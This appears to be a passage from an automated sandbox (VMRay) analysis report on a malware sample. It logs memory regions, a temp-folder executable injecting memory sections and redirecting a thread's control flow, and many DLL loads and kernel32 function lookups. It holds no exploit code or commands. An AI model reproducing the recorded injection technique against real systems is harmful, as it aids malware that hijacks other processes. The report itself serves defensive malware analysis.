private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Injection Information
+
Injection Type Source Process Source Os Thread ID Injection Info Success Count Logfile
Modify Memory #3: c:\users\hjrd1k~1\appdata\local\temp\8162.exe 0xba4 address = 0x400000, size = 1024 True 1
Fn
Data
Modify Memory #3: c:\users\hjrd1k~1\appdata\local\temp\8162.exe 0xba4 address = 0x401000, size = 62976 True 1
Fn
Data
Modify Memory #3: c:\users\hjrd1k~1\appdata\local\temp\8162.exe 0xba4 address = 0x411000, size = 18944 True 1
Fn
Data
Modify Memory #3: c:\users\hjrd1k~1\appdata\local\temp\8162.exe 0xba4 address = 0x416000, size = 6144 True 1
Fn
Data
Modify Memory #3: c:\users\hjrd1k~1\appdata\local\temp\8162.exe 0xba4 address = 0x7efde008, size = 4 True 1
Fn
Data
Modify Control Flow #3: c:\users\hjrd1k~1\appdata\local\temp\8162.exe 0xba4 os_tid = 0xbb8, address = 0x778601c4 True 1
Fn
Host Behavior
File (3)
+
Operation Filename Additional Information Success Count Logfile
Open STD_INPUT_HANDLE True 1
Fn
Open STD_OUTPUT_HANDLE True 1
Fn
Open STD_ERROR_HANDLE True 1
Fn
Process (3)
+
Operation Additional Information Success Count Logfile
Module (38)
+
Operation Additional Information Success Count Logfile
Load module_name = advapi32.dll, base_address = 2000355328 True 1
Fn
Load module_name = shell32.dll, base_address = 1983250432 True 1
Fn
Load module_name = user32.dll, base_address = 1975910400 True 1
Fn
Get Handle module_name = c:\windows\syswow64\kernel32.dll True 1
Fn
Get Filename True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 1970097963 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 1970091423 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 1970082386 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 1970094600 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 1970097448 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 1970618635 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 1970618773 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 1970131743 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 1970204286 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 2005484572 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 2005648654 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 2005648257 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 1970204808 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 2005534167 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 2005649956 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 2005339020 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 2006121960 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 2005671453 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 1970620257 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 1970588945 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0 False 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 1970618959 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 1970620081 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 1970693750 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 1970620241 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 1970693617 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 1970620353 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 1970620385 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 1970620401 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0 False 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 1970204384 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0 False 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0 False 1
Fn
System (4)
+
Operation Additional Information Success Count Logfile
Sleep duration = 200 milliseconds (0.200 seconds) True 2
Fn
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefox with deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image